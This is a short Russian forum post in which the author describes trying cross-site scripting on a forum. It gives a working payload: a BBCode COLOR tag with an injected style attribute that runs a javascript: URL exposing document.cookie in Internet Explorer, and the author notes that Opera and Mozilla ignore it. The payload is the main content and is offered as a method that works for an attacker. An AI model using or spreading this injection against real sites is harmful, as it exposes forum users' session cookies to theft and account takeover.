Вот ещё один камень в огород IE: при попытке выполнить мною межсайтовый скриптинг на одном из форумов было обнаружено, что IE реагирует нужным образом для взломщика на такой вот код:
Код:
[COLOR=Green" style=background-image:url(javascript:alert(document.cookie)) size="2]test[/COLOR]
Ни Опера ни Мозилла не реагируют на такой код!